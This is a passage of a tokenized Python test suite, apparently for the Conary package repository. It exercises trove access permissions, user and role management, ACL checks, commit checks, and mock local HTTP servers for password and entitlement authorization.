] ) . values ( ) , [ False , False , False ] ) <EOL> self . assertEqual ( sorted ( userClient . troveNames ( self . cfg . buildLabel ) ) , <EOL> [ '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( sorted ( repos . listTroveAccess ( '<STR_LIT:localhost>' , '<STR_LIT:user>' ) ) , <EOL> [ comp . getNameVersionFlavor ( ) , grp . getNameVersionFlavor ( ) ] ) <EOL> expectNewTroves = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:foo>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] <EOL> newTroves = mirrorClient . getNewTroveList ( '<STR_LIT:localhost>' , <NUM_LIT:0> ) <EOL> newTroves = [ ( x [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] , str ( x [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) ) for x in newTroves ] <EOL> self . assertEqual ( sorted ( newTroves ) , sorted ( expectNewTroves ) ) <EOL> repos . deleteTroveAccess ( '<STR_LIT:user>' , [ comp . getNameVersionFlavor ( ) ] ) <EOL> self . assertEqual ( sorted ( repos . listTroveAccess ( '<STR_LIT:localhost>' , '<STR_LIT:user>' ) ) , <EOL> [ grp . getNameVersionFlavor ( ) ] ) <EOL> assert ( userClient . hasTrove ( * comp . getNameVersionFlavor ( ) ) ) <EOL> repos . deleteTroveAccess ( '<STR_LIT:user>' , [ pkg . getNameVersionFlavor ( ) ] ) <EOL> repos . deleteTroveAccess ( '<STR_LIT:user>' , [ grp . getNameVersionFlavor ( ) ] ) <EOL> self . assertEqual ( repos . listTroveAccess ( '<STR_LIT:localhost>' , '<STR_LIT:user>' ) , [ ] ) <EOL> self . assertEqual ( userClient . hasTroves ( [ <EOL> pkg . getNameVersionFlavor ( ) , grp . getNameVersionFlavor ( ) ] ) . values ( ) , <EOL> [ False , False ] ) <EOL> self . assertEqual ( userClient . troveNames ( self . cfg . buildLabel ) , [ ] ) <EOL> def testSimpleCommitsWithFiles ( self ) : <EOL> bl = self . cfg . buildLabel <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> userClient = self . getRepositoryClient ( user = '<STR_LIT:user>' , password = '<STR_LIT:user>' ) <EOL> repos . addAcl ( bl , "<STR_LIT:user>" , '<STR_LIT>' , bl ) <EOL> trv = self . addComponent ( '<STR_LIT>' , <NUM_LIT:1> , fileContents = [ <EOL> ( '<STR_LIT>' % i , '<STR_LIT>' % ( i , ) ) <EOL> for i in range ( <NUM_LIT:5> ) ] ) <EOL> ret1 = repos . getTroveVersionList ( "<STR_LIT:localhost>" , { "<STR_LIT>" : None } ) <EOL> trv1 = repos . getTrove ( * trv . getNameVersionFlavor ( ) ) <EOL> ret2 = userClient . getTroveVersionList ( "<STR_LIT:localhost>" , { "<STR_LIT>" : None } ) <EOL> trv2 = userClient . getTrove ( * trv . getNameVersionFlavor ( ) ) <EOL> self . assertEqual ( ret1 , ret2 ) <EOL> self . assertEqual ( trv1 , trv2 ) <EOL> def testTroveAccessSimple ( self ) : <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> userClient = self . getRepositoryClient ( user = '<STR_LIT:user>' , password = '<STR_LIT:user>' ) <EOL> compa = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> compb = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> compc = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> pkga = self . addCollection ( '<STR_LIT:a>' , '<STR_LIT:1>' , [ '<STR_LIT>' ] ) <EOL> pkgb = self . addCollection ( '<STR_LIT:b>' , '<STR_LIT:1>' , [ '<STR_LIT>' ] ) <EOL> pkgc = self . addCollection ( '<STR_LIT:c>' , '<STR_LIT:1>' , [ '<STR_LIT>' ] ) <EOL> grp1 = self . addCollection ( '<STR_LIT>' , '<STR_LIT:1>' , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> grp2 = self . addCollection ( '<STR_LIT>' , '<STR_LIT:1>' , [ '<STR_LIT:b>' , '<STR_LIT:c>' ] ) <EOL> assert ( not userClient . hasTrove ( * compa . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkga . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * grp1 . getNameVersionFlavor ( ) ) ) <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ pkga . getNameVersionFlavor ( ) ] ) <EOL> assert ( userClient . hasTrove ( * compa . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * pkga . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkgb . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkgc . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * grp1 . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * grp2 . getNameVersionFlavor ( ) ) ) <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ grp1 . getNameVersionFlavor ( ) ] ) <EOL> assert ( userClient . hasTrove ( * pkga . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * pkgb . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkgc . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * grp2 . getNameVersionFlavor ( ) ) ) <EOL> repos . deleteTroveAccess ( '<STR_LIT:user>' , [ pkga . getNameVersionFlavor ( ) ] ) <EOL> assert ( userClient . hasTrove ( * pkga . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * pkgb . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkgc . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * grp2 . getNameVersionFlavor ( ) ) ) <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ grp2 . getNameVersionFlavor ( ) ] ) <EOL> assert ( userClient . hasTrove ( * pkgc . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * grp2 . getNameVersionFlavor ( ) ) ) <EOL> repos . deleteTroveAccess ( '<STR_LIT:user>' , [ grp1 . getNameVersionFlavor ( ) ] ) <EOL> assert ( not userClient . hasTrove ( * compa . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkga . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * grp1 . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * pkgc . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * pkgb . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * grp2 . getNameVersionFlavor ( ) ) ) <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ compc . getNameVersionFlavor ( ) ] ) <EOL> repos . deleteTroveAccess ( '<STR_LIT:user>' , [ grp2 . getNameVersionFlavor ( ) ] ) <EOL> for x in [ compa , compb , pkga , pkgb , pkgc , grp1 , grp2 ] : <EOL> assert ( not userClient . hasTrove ( * x . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * compc . getNameVersionFlavor ( ) ) ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT>' , '<STR_LIT:user>' ) <EOL> user2Client = self . getRepositoryClient ( user = '<STR_LIT>' , password = '<STR_LIT:user>' ) <EOL> for x in [ compa , compb , compc , pkga , pkgb , pkgc , grp1 , grp2 ] : <EOL> assert ( not user2Client . hasTrove ( * x . getNameVersionFlavor ( ) ) ) <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ grp1 . getNameVersionFlavor ( ) ] ) <EOL> repos . addTroveAccess ( '<STR_LIT>' , [ grp2 . getNameVersionFlavor ( ) ] ) <EOL> assert ( not user2Client . hasTrove ( * compa . getNameVersionFlavor ( ) ) ) <EOL> assert ( not user2Client . hasTrove ( * pkga . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkgc . getNameVersionFlavor ( ) ) ) <EOL> def testTroveAccessMultiple ( self ) : <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> userClient = self . getRepositoryClient ( user = '<STR_LIT:user>' , password = '<STR_LIT:user>' ) <EOL> haves = [ ] <EOL> havenots = [ ] <EOL> for x in xrange ( <NUM_LIT:5> ) : <EOL> compa = self . addComponent ( '<STR_LIT>' , str ( x ) ) <EOL> compb = self . addComponent ( '<STR_LIT>' , str ( x ) ) <EOL> compc = self . addComponent ( '<STR_LIT>' , str ( x ) ) <EOL> pkga = self . addCollection ( '<STR_LIT:a>' , str ( x ) , [ '<STR_LIT>' ] ) <EOL> pkgb = self . addCollection ( '<STR_LIT:b>' , str ( x ) , [ '<STR_LIT>' ] ) <EOL> pkgc = self . addCollection ( '<STR_LIT:c>' , str ( x ) , [ '<STR_LIT>' ] ) <EOL> grp1 = self . addCollection ( '<STR_LIT>' , str ( x ) , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> grp2 = self . addCollection ( '<STR_LIT>' , str ( x ) , [ '<STR_LIT:b>' , '<STR_LIT:c>' ] ) <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ grp1 . getNameVersionFlavor ( ) ] ) <EOL> haves . append ( grp1 . getNameVersionFlavor ( ) ) <EOL> haves . append ( pkga . getNameVersionFlavor ( ) ) <EOL> haves . append ( pkgb . getNameVersionFlavor ( ) ) <EOL> haves . append ( compa . getNameVersionFlavor ( ) ) <EOL> haves . append ( compb . getNameVersionFlavor ( ) ) <EOL> havenots . append ( pkgc . getNameVersionFlavor ( ) ) <EOL> havenots . append ( grp2 . getNameVersionFlavor ( ) ) <EOL> for t in haves : <EOL> assert ( userClient . hasTrove ( * t ) ) <EOL> for t in havenots : <EOL> assert ( not userClient . hasTrove ( * t ) ) <EOL> if t [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ t ] ) <EOL> for t in haves + havenots : <EOL> assert ( userClient . hasTrove ( * t ) ) <EOL> def testTroveAccessMissing ( self ) : <EOL> '''<STR_LIT>''' <EOL> repos = self . openRepository ( ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> userClient = self . getRepositoryClient ( user = '<STR_LIT:user>' , password = '<STR_LIT:user>' ) <EOL> version = self . _cvtVersion ( '<STR_LIT:1.0>' ) <EOL> try : <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ <EOL> ( '<STR_LIT>' , version , deps . parseFlavor ( '<STR_LIT>' ) ) ] ) <EOL> except errors . TroveMissing , e : <EOL> self . assertEqual ( e . version , version ) <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> def testUserRoleCreation ( self ) : <EOL> """<STR_LIT>""" <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> comp = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1.0>' ) <EOL> pkg = self . addCollection ( '<STR_LIT:foo>' , '<STR_LIT:1.0>' , [ '<STR_LIT>' ] ) <EOL> grp = self . addCollection ( '<STR_LIT>' , '<STR_LIT:1.0>' , [ '<STR_LIT:foo>' ] ) <EOL> repos . addUser ( self . cfg . buildLabel , "<STR_LIT:user>" , "<STR_LIT>" ) <EOL> userClient = self . getRepositoryClient ( user = '<STR_LIT:user>' , password = '<STR_LIT>' ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> userClient . hasTrove , * comp . getNameVersionFlavor ( ) ) <EOL> repos . addRole ( self . cfg . buildLabel , "<STR_LIT:user>" ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> userClient . hasTrove , * comp . getNameVersionFlavor ( ) ) <EOL> repos . updateRoleMembers ( self . cfg . buildLabel , "<STR_LIT:user>" , [ "<STR_LIT:user>" ] ) <EOL> assert ( not userClient . hasTrove ( * comp . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkg . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * grp . getNameVersionFlavor ( ) ) ) <EOL> repos . addAcl ( self . cfg . buildLabel , "<STR_LIT:user>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> assert ( not userClient . hasTrove ( * comp . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkg . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * grp . getNameVersionFlavor ( ) ) ) <EOL> repos . addAcl ( self . cfg . buildLabel , "<STR_LIT:user>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> assert ( userClient . hasTrove ( * comp . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkg . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * grp . getNameVersionFlavor ( ) ) ) <EOL> def testRoleDeletion ( self ) : <EOL> """<STR_LIT>""" <EOL> bl = self . cfg . buildLabel <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( bl , '<STR_LIT>' ) <EOL> repos . addRole ( bl , "<STR_LIT>" ) <EOL> repos . addRole ( bl , "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . addUser ( bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> specialClient = self . getRepositoryClient ( user = "<STR_LIT>" , password = "<STR_LIT>" ) <EOL> self . assertRaises ( errors . InsufficientPermission , specialClient . getRoles , bl ) <EOL> repos . updateRoleMembers ( bl , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( specialClient . getRoles ( bl ) , [ "<STR_LIT>" ] ) <EOL> repos . updateRoleMembers ( bl , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( set ( specialClient . getRoles ( bl ) ) , set ( [ "<STR_LIT>" , "<STR_LIT>" ] ) ) <EOL> repos . deleteUserByName ( bl , "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> self . assertFalse ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . addRole ( bl , "<STR_LIT>" ) <EOL> repos . addUser ( bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . updateRoleMembers ( bl , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> repos . deleteUserByName ( bl , "<STR_LIT>" ) <EOL> self . assertFalse ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . addRole ( bl , "<STR_LIT>" ) <EOL> repos . addUser ( bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . updateRoleMembers ( bl , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> repos . setRoleCanMirror ( bl , "<STR_LIT>" , True ) <EOL> repos . deleteUserByName ( bl , "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . deleteRole ( bl , "<STR_LIT>" ) <EOL> repos . addRole ( bl , "<STR_LIT>" ) <EOL> repos . addUser ( bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . updateRoleMembers ( bl , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> repos . setRoleIsAdmin ( bl , "<STR_LIT>" , True ) <EOL> repos . deleteUserByName ( bl , "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . deleteRole ( bl , "<STR_LIT>" ) <EOL> repos . addRole ( bl , "<STR_LIT>" ) <EOL> repos . addUser ( bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . addUser ( bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . updateRoleMembers ( bl , "<STR_LIT>" , [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> repos . deleteUserByName ( bl , "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . deleteUserByName ( bl , "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . deleteRole ( bl , "<STR_LIT>" ) <EOL> repos . addRole ( bl , "<STR_LIT>" ) <EOL> repos . addUser ( bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . updateRoleMembers ( bl , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> repos . addAcl ( bl , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . deleteUserByName ( bl , "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . deleteRole ( bl , "<STR_LIT>" ) <EOL> repos . addRole ( bl , "<STR_LIT>" ) <EOL> trv = self . addComponent ( "<STR_LIT>" ) <EOL> repos . addUser ( bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . updateRoleMembers ( bl , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> repos . addTroveAccess ( "<STR_LIT>" , [ trv . getNameVersionFlavor ( ) ] ) <EOL> repos . deleteUserByName ( bl , "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . deleteRole ( bl , "<STR_LIT>" ) <EOL> def testCommitCheck ( self ) : <EOL> bl = self . cfg . buildLabel <EOL> repos = self . openRepository ( ) <EOL> self . addUserAndRole ( repos , bl , "<STR_LIT:user>" , "<STR_LIT>" ) <EOL> repos . addAcl ( bl , "<STR_LIT:user>" , '<STR_LIT>' , bl , write = False ) <EOL> repos . addAcl ( bl , "<STR_LIT:user>" , '<STR_LIT>' , bl , write = True ) <EOL> userRepos = self . getRepositoryClient ( user = "<STR_LIT:user>" , password = "<STR_LIT>" ) <EOL> badRepos = self . getRepositoryClient ( user = "<STR_LIT:user>" , password = "<STR_LIT>" ) <EOL> trv1 = self . addComponent ( "<STR_LIT>" , "<STR_LIT:1>" , repos = repos ) <EOL> trv2 = self . addComponent ( "<STR_LIT>" , "<STR_LIT:1>" , repos = repos ) <EOL> self . assertTrue ( repos . commitCheck ( [ trv1 . getNameVersionFlavor ( ) , trv2 . getNameVersionFlavor ( ) ] ) ) <EOL> self . assertTrue ( userRepos . commitCheck ( [ trv2 . getNameVersionFlavor ( ) ] ) ) <EOL> self . assertRaises ( errors . TroveAccessError , userRepos . commitCheck , [ trv1 . getNameVersionFlavor ( ) ] ) <EOL> self . assertRaises ( errors . TroveAccessError , badRepos . commitCheck , [ trv1 . getNameVersionFlavor ( ) ] ) <EOL> self . assertRaises ( errors . TroveAccessError , badRepos . commitCheck , [ trv2 . getNameVersionFlavor ( ) ] ) <EOL> self . assertRaises ( errors . TroveAccessError , badRepos . commitCheck , <EOL> [ trv1 . getNameVersionFlavor ( ) , trv2 . getNameVersionFlavor ( ) ] ) <EOL> self . addComponent ( "<STR_LIT>" , "<STR_LIT:2>" , repos = userRepos ) <EOL> def testCheckTroveCache ( self ) : <EOL> bl = self . cfg . buildLabel <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( bl , '<STR_LIT>' ) <EOL> self . addUserAndRole ( repos , bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . addUserAndRole ( repos , bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . addAcl ( bl , "<STR_LIT>" , '<STR_LIT>' , label = None ) <EOL> repos . addAcl ( bl , "<STR_LIT>" , '<STR_LIT>' , label = None , write = True ) <EOL> repos . addAcl ( bl , "<STR_LIT>" , '<STR_LIT>' , label = None , write = True ) <EOL> t1 = self . addComponent ( "<STR_LIT>" ) <EOL> t2 = self . addComponent ( "<STR_LIT>" ) <EOL> t3 = self . addComponent ( "<STR_LIT>" ) <EOL> self . addCollection ( "<STR_LIT:foo>" , "<STR_LIT:1>" , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> ret = repos . getTroveVersionList ( bl . getHost ( ) , { None : None } ) <EOL> self . assertEqual ( set ( ret . keys ( ) ) , set ( [ "<STR_LIT:foo>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) ) <EOL> limRepos = self . getRepositoryClient ( user = "<STR_LIT>" , password = "<STR_LIT>" ) <EOL> ret = limRepos . getTroveVersionList ( bl . getHost ( ) , { None : None } ) <EOL> self . assertEqual ( set ( ret . keys ( ) ) , set ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) ) <EOL> self . assertRaises ( errors . TroveAccessError , limRepos . commitCheck , [ t1 . getNameVersionFlavor ( ) , t2 . getNameVersionFlavor ( ) ] ) <EOL> self . assertRaises ( errors . TroveAccessError , limRepos . commitCheck , [ t2 . getNameVersionFlavor ( ) , t3 . getNameVersionFlavor ( ) ] ) <EOL> otherRepos = self . getRepositoryClient ( user = "<STR_LIT>" , password = "<STR_LIT>" ) <EOL> ret = otherRepos . getTroveVersionList ( bl . getHost ( ) , { None : None } ) <EOL> self . assertEqual ( set ( ret . keys ( ) ) , set ( [ "<STR_LIT>" , "<STR_LIT>" ] ) ) <EOL> self . assertTrue ( otherRepos . commitCheck ( [ t2 . getNameVersionFlavor ( ) , t3 . getNameVersionFlavor ( ) ] ) ) <EOL> self . assertRaises ( errors . TroveAccessError , otherRepos . commitCheck , <EOL> [ t1 . getNameVersionFlavor ( ) , t2 . getNameVersionFlavor ( ) , t3 . getNameVersionFlavor ( ) ] ) <EOL> def testGetTrovesBySource ( self ) : <EOL> repos = self . openRepository ( ) <EOL> bl = self . cfg . buildLabel <EOL> repos . deleteUserByName ( bl , '<STR_LIT>' ) <EOL> self . addUserAndRole ( repos , bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . addAcl ( bl , "<STR_LIT>" , '<STR_LIT>' , label = None ) <EOL> limRepos = self . getRepositoryClient ( user = "<STR_LIT>" , password = "<STR_LIT>" ) <EOL> src = self . addComponent ( '<STR_LIT>' ) <EOL> trv = self . addCollection ( '<STR_LIT:foo>' , [ '<STR_LIT>' ] , createComps = True , sourceName = '<STR_LIT>' ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> limRepos . getTrove , * src . getNameVersionFlavor ( ) ) <EOL> lst = limRepos . getTrovesBySource ( '<STR_LIT>' , src . getVersion ( ) ) <EOL> assert ( sorted ( x [ <NUM_LIT:0> ] for x in lst ) == [ '<STR_LIT:foo>' , '<STR_LIT>' ] ) <EOL> self . addCollection ( '<STR_LIT>' , [ '<STR_LIT>' ] , createComps = True , sourceName = '<STR_LIT>' ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> limRepos . getTrovesBySource , '<STR_LIT>' , src . getVersion ( ) ) <EOL> lst = repos . getTrovesBySource ( '<STR_LIT>' , src . getVersion ( ) ) <EOL> assert ( sorted ( x [ <NUM_LIT:0> ] for x in lst ) == [ '<STR_LIT:foo>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def testGetTrovesByLabel ( self ) : <EOL> bl = self . cfg . buildLabel <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( bl , '<STR_LIT>' ) <EOL> self . addUserAndRole ( repos , bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . addAcl ( bl , "<STR_LIT>" , '<STR_LIT>' , label = None ) <EOL> limRepos = self . getRepositoryClient ( user = "<STR_LIT>" , password = "<STR_LIT>" ) <EOL> self . addComponent ( "<STR_LIT>" ) <EOL> self . addComponent ( "<STR_LIT>" ) <EOL> self . addComponent ( "<STR_LIT>" ) <EOL> all = sorted ( str ( x ) for x in repos . getLabelsForHost ( bl . getHost ( ) ) ) <EOL> limited = sorted ( str ( x ) for x in limRepos . getLabelsForHost ( bl . getHost ( ) ) ) <EOL> assert ( limited == [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert ( all == [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> class PasswordHttpRequests ( SimpleHTTPRequestHandler ) : <EOL> valid = { ( '<STR_LIT:test>' , '<STR_LIT:foo>' ) : True , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) : True } <EOL> allowNoIp = False <EOL> def log_message ( self , * args , ** kw ) : <EOL> pass <EOL> def do_GET ( self ) : <EOL> url , args = self . path . split ( "<STR_LIT:?>" , <NUM_LIT:1> ) <EOL> if url not in ( "<STR_LIT>" , '<STR_LIT>' ) : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> args = cgi . parse_qs ( args ) <EOL> if len ( args ) != <NUM_LIT:3> and not self . allowNoIp : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> elif len ( args ) == <NUM_LIT:2> : <EOL> if not '<STR_LIT:user>' in args or not '<STR_LIT:password>' in args : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> args [ '<STR_LIT>' ] = [ '<STR_LIT:127.0.0.1>' ] <EOL> elif len ( args ) != <NUM_LIT:3> : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> if args [ '<STR_LIT>' ] [ <NUM_LIT:0> ] not in httputils . LocalHosts : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> if ( args [ '<STR_LIT:user>' ] [ <NUM_LIT:0> ] , args [ '<STR_LIT:password>' ] [ <NUM_LIT:0> ] ) in self . valid : <EOL> xml = "<STR_LIT>" <EOL> else : <EOL> xml = "<STR_LIT>" <EOL> self . send_response ( <NUM_LIT:200> ) <EOL> self . send_header ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . send_header ( "<STR_LIT>" , len ( xml ) ) <EOL> self . end_headers ( ) <EOL> self . wfile . write ( xml ) <EOL> class EntitlementRequests ( SimpleHTTPRequestHandler ) : <EOL> valid = { ( '<STR_LIT>' , '<STR_LIT>' ) : ( '<STR_LIT>' , '<STR_LIT>' , None , False ) , <EOL> ( None , '<STR_LIT>' ) : ( '<STR_LIT>' , '<STR_LIT>' , None , False ) } <EOL> def log_message ( self , * args , ** kw ) : <EOL> pass <EOL> def check ( self , entClass , entKey ) : <EOL> return self . valid . get ( ( entClass , entKey ) , None ) <EOL> def do_GET ( self ) : <EOL> url , args = self . path . split ( "<STR_LIT:?>" , <NUM_LIT:1> ) <EOL> if url != "<STR_LIT>" : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> args = cgi . parse_qs ( args ) <EOL> if '<STR_LIT:class>' not in args : <EOL> args [ '<STR_LIT:class>' ] = [ None ] <EOL> if len ( args ) != <NUM_LIT:4> : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> if ( args [ '<STR_LIT>' ] != [ '<STR_LIT:localhost>' ] or <EOL> args [ '<STR_LIT>' ] [ <NUM_LIT:0> ] not in httputils . LocalHosts ) : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> mappedEnt = self . check ( args [ '<STR_LIT:class>' ] [ <NUM_LIT:0> ] , args [ '<STR_LIT:key>' ] [ <NUM_LIT:0> ] ) <EOL> if mappedEnt is not None : <EOL> xml = conarycfg . emitEntitlement ( '<STR_LIT:localhost>' , * mappedEnt ) <EOL> else : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> self . send_response ( <NUM_LIT:200> ) <EOL> self . send_header ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . send_header ( "<STR_LIT>" , len ( xml ) ) <EOL> self . end_headers ( ) <EOL> self . wfile . write ( xml ) <EOL> class OneTimeEntitlementRequests ( EntitlementRequests ) : <EOL> seen = set ( ) <EOL> def check ( self , entClass , entKey ) : <EOL> if ( entClass , entKey ) in self . seen : <EOL> return None <EOL> self . seen . add ( ( entClass , entKey ) ) <EOL> return EntitlementRequests . check ( self , entClass , entKey ) <EOL> class OneTimeEntitlementRequestsInternalTimeout ( OneTimeEntitlementRequests ) : <EOL> valid = dict ( EntitlementRequests . valid ) <EOL> for key , val in valid . items ( ) : <EOL> valid [ key ] = ( val [ <NUM_LIT:0> ] , val [ <NUM_LIT:1> ] , <NUM_LIT:1> , val [ <NUM_LIT:3> ] ) <EOL> class RetryEntitlementRequests ( EntitlementRequests ) : <EOL> valid = dict ( EntitlementRequests . valid ) <EOL> for key , val in valid . items ( ) : <EOL> valid [ key ] = ( val [ <NUM_LIT:0> ] , val [ <NUM_LIT:1> ] ) <EOL> class AuthorizationServer : <EOL> def __init__ ( self , requestHandler ) : <EOL> self . port = testhelp . findPorts ( num = <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> self . requestHandler = requestHandler <EOL> self . start ( ) <EOL> def start ( self ) : <EOL> self . childPid = os . fork ( ) <EOL> if self . childPid > <NUM_LIT:0> : <EOL> sock_utils . tryConnect ( "<STR_LIT:127.0.0.1>" , self . port ) <EOL> return <EOL> try : <EOL> httpServer = HTTPServer ( ( 